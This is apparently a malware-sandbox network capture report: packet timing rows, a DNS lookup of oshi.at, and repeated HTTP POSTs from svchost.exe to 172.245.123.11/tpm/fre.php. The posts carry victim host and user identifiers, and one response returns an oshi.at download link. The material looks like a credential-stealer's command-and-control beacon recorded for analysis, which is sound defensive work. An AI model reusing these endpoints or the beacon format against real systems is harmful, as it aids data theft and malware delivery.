                                                              Jan 7, 2025 11:03:47.253619909 CET8050134172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.253638983 CET5013480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.253676891 CET5013480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.258469105 CET8050134172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.378597975 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.383460999 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.383547068 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.385638952 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.390383005 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.390461922 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.395221949 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.939903021 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.940009117 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.940076113 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:47.940119982 CET5013580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:47.944896936 CET8050135172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.067255974 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.072169065 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.072272062 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.074377060 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.079116106 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.079188108 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.083973885 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.599855900 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.599950075 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.599994898 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.600023985 CET5013680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.604851007 CET8050136172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.738837957 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.743715048 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.743794918 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.745882034 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.750680923 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:48.750749111 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:48.755521059 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.272100925 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.272118092 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.272186041 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.299638033 CET5013780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.306405067 CET8050137172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.434294939 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.441288948 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.441371918 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.443593025 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.450885057 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.450938940 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.457834959 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.952893019 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.952987909 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.953043938 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:49.953084946 CET5013880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:49.959959030 CET8050138172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.082169056 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.086988926 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.087069988 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.089078903 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.093852997 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.093929052 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.098769903 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.591058016 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.591173887 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.591200113 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.591223955 CET5013980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.596015930 CET8050139172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.723057032 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.727849960 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.729959011 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.732063055 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.739063978 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:50.740699053 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:50.745553970 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.247888088 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.248013973 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.248033047 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.248064041 CET5014080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.252939939 CET8050140172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.379426003 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.384576082 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.384699106 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.386800051 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.391577005 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.391659021 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.396697998 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.922112942 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.922208071 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.922271013 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:51.922317028 CET5014180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:51.927639008 CET8050141172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.051234961 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.056072950 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.056159019 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.058275938 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.063070059 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.063133955 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.070691109 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.591394901 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.591519117 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.591820955 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.591880083 CET5014280192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.596275091 CET8050142172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.727746964 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.732557058 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.732660055 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.734746933 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.739496946 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:52.739568949 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:52.744282007 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.254230976 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.254331112 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.254374981 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.254429102 CET5014380192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.259143114 CET8050143172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.378722906 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.383596897 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.383714914 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.386064053 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.390794992 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.390870094 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.395586014 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.917356014 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.917455912 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.917994022 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:53.918045998 CET5014480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:53.922319889 CET8050144172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.050762892 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.055568933 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.055644989 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.057760954 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.062496901 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.062572002 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.067321062 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.583080053 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.583190918 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.583210945 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.583241940 CET5014580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.588579893 CET8050145172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.706964970 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.711775064 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.711884975 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.713995934 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.718858004 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:54.718933105 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:54.723706961 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.236610889 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.236735106 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.236778021 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.236824989 CET5014680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.241475105 CET8050146172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.363739014 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.368577003 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.368650913 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.370740891 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.375533104 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.375591993 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.380965948 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.875785112 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.875901937 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.875955105 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:55.876003027 CET5014780192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:55.880700111 CET8050147172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.004338980 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.009171009 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.009361982 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.011501074 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.016302109 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.016359091 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.021137953 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.528043032 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.528121948 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.528237104 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.528317928 CET5014880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.533026934 CET8050148172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.660552979 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.665401936 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.665600061 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.667726994 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.672554970 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:56.672621965 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:56.677428961 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.196450949 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.196552992 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.196556091 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.196599960 CET5014980192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.201332092 CET8050149172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.332197905 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.336971045 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.337205887 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.339339018 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.344206095 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.344265938 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.349037886 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.860636950 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.860744953 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:57.860802889 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.860802889 CET5015080192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:57.865550995 CET8050150172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.016447067 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.021249056 CET8050151172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.021342993 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.023457050 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.028286934 CET8050151172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.028337002 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.033070087 CET8050151172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.560226917 CET8050151172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.560448885 CET8050151172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:03:58.560538054 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.560575962 CET5015180192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:03:58.565391064 CET8050151172.245.123.11192.168.2.5
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 7, 2025 11:01:58.613193035 CET6137453192.168.2.51.1.1.1
                                                              Jan 7, 2025 11:01:58.622076988 CET53613741.1.1.1192.168.2.5
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jan 7, 2025 11:01:58.613193035 CET192.168.2.51.1.1.10x3497Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jan 7, 2025 11:01:58.622076988 CET1.1.1.1192.168.2.50x3497No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                              Jan 7, 2025 11:01:58.622076988 CET1.1.1.1192.168.2.50x3497No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                              • oshi.at
                                                              • 172.245.123.11
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549704172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:56.709935904 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 180
                                                              Connection: close
                                                              Jan 7, 2025 11:01:56.715462923 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: 'ckav.rualfons536720ALFONS-PCk0FDD42EE188E931437F4FBE2CFacyg
                                                              Jan 7, 2025 11:01:57.233551025 CET263INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:01:57 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 15
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549705172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:57.377790928 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 180
                                                              Connection: close
                                                              Jan 7, 2025 11:01:57.382608891 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: 'ckav.rualfons536720ALFONS-PC+0FDD42EE188E931437F4FBE2CUH1aT
                                                              Jan 7, 2025 11:01:57.878271103 CET263INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:01:57 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 15
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549706172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:57.939043045 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:01:57.943922997 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:01:58.457973003 CET307INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:01:58 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 59
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 2c 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 68 74 74 70 73 3a 2f 2f 6f 73 68 69 2e 61 74 2f 72 74 42 53 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: ,https://oshi.at/rtBSFile not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.549708172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:58.641072035 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:01:58.646332979 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:01:59.167339087 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:01:59 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.549709172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:59.321314096 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:01:59.326148033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:01:59.826330900 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:01:59 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.549710172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:01:59.970819950 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:01:59.975651979 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:00.489820004 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:00 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.549711172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:00.665031910 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
